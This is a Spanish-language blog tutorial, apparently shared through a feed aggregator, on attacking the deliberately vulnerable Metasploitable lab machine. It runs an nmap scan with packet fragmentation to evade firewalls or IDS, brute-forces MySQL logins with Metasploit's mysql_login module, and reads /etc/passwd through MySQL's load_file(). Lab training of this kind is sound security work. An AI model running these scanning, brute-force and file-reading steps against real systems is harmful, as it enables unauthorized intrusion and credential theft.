Quantcast
Channel: vidasConcurrentes
Viewing all articles
Browse latest Browse all 11

Entrenando con Metasploitable (I). Introducción y ataque a mysql

$
0
0

Hoy vamos a presentar Metasploitable, que es una distribución GNU/Linux vulnerable basada en Ubuntu 8.04 server (Hardy Heron) que poseé varias vulnerabilidades: como pueden ser credenciales de acceso poco robustas, y servicios vulnerables como distcc, tikiwiki y mysql.

DescargarDescarga Metasploitable (torrent)

La distro ya viene instalada como imagen de VMware y para arrancar el servidor solo necesitamos VMware Player que es gratuito. Una vez instalado y configurada la red en modo Bridge para poder realizar la explotación desde Backtrack (o Metasploit desde Windows y Nmap).

Una vez se nos haya descargado la máquina virtual solamente tenemos que descomprimir y abrir el archivo con VMware Player. La ponemos en marcha y cuando nos pida credenciales ponemos msfadmin / msfadmin:

Login msfadmin en Metasploitable

Una vez logueados haremos un ifconfig para ver que ip tenemos asociada (en nuestro caso 192.168.0.2) y nos pasaremos a Backtrack para comenzar a jugar!

ifconfig nos dirá la IP en la que está corriendo Metasploitable

Una vez en Backtrack comenzaremos realizando un nmap para descubrir puertos abiertos y servicios vulnerables:

nmap -sS -sV -O -f -n 192.168.0.2

-sS   Análisis TCP SYN

-sV   Detección de la versión de servicios

-O   Activar detección del sistema operativo

-f   Fragmentar paquetes (para evadir firewalls o IDS)

-n   No realizar resolución DNS

El resultado de nmap es el siguiente

Resultado del escaneo con nmap

Podemos observar que nos indica que el servidor está ejecutando mysql 5.0.51a, pues desde Metasploit buscamos modulos relacionados con mysql:

Resultados Metasploit mysql

Cargamos scanner/mysql/mysql_login para realizar un ataque de diccionario contra el servicio mysql del server y con show options vemos las opciones del módulo:

Opciones del modulo mysql_login

Cambiaremos las opciones como vienen aquí, donde diccionario.txt es este archivo:

msf auxiliary(mysql_login) > set PASS_FILE /root/diccionario.txt
PASS_FILE => /root/diccionario.txt

setmsf auxiliary(mysql_login) > set USER_FILE /root/diccionario.txt
USER_FILE => /root/diccionario.txt

msf auxiliary(mysql_login) > set RHOSTS 192.168.0.2
RHOSTS => 192.168.0.2

msf auxiliary(mysql_login) > run

Ahora probará las distintas combinaciones de credenciales usuario / contraseña y cuando haya encontrado los credenciales nos devolverá esto:

[*] 192.168.0.2:3306 Trying username:'root' with password:'root'
[+] 192.168.0.2:3306 - SUCCESSFUL LOGIN 'root' : 'root'

Ya sabemos que las credenciales de acceso al servidor mysql son root / root. Nos conectamos y nos identificamos:
Login en mysql

Una vez logueados en mysql podemos obtener el archivo /etc/passwd para ver los usuarios que tenemos en el sistema.

mysql> select load_file('/etc/passwd');

y obtendremos esto:

Obteniendo /etc/passwd mediante load_file()

Esto es todo por hoy, en sucesivas entradas veremos cómo explotar otros servicios de Metasploitable.
Happy training!


Viewing all articles
Browse latest Browse all 11

Trending Articles


Vimeo 10.7.1 by Vimeo.com, Inc.


UPDATE SC IDOL: TWO BECOME ONE


KASAMBAHAY BILL IN THE HOUSE


Girasoles para colorear


Presence Quotes – Positive Quotes


EASY COME, EASY GO


Love with Heart Breaking Quotes


Re:Mutton Pies (lleechef)


Ka longiing longsem kaba skhem bad kaba khlain ka pynlong kein ia ka...


Vimeo 10.7.0 by Vimeo.com, Inc.


FORECLOSURE OF REAL ESTATE MORTGAGE


FORTUITOUS EVENT


Pokemon para colorear


Sapos para colorear


Smile Quotes


Letting Go Quotes


Love Song lyrics that marks your Heart


RE: Mutton Pies (frankie241)


Hato lada ym dei namar ka jingpyrshah jong U JJM Nichols Roy (Bah Joy) ngin...


Long Distance Relationship Tagalog Love Quotes